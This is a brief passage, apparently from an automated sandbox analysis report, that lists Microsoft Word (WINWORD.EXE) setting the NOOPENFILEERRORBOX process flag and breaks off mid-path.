            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program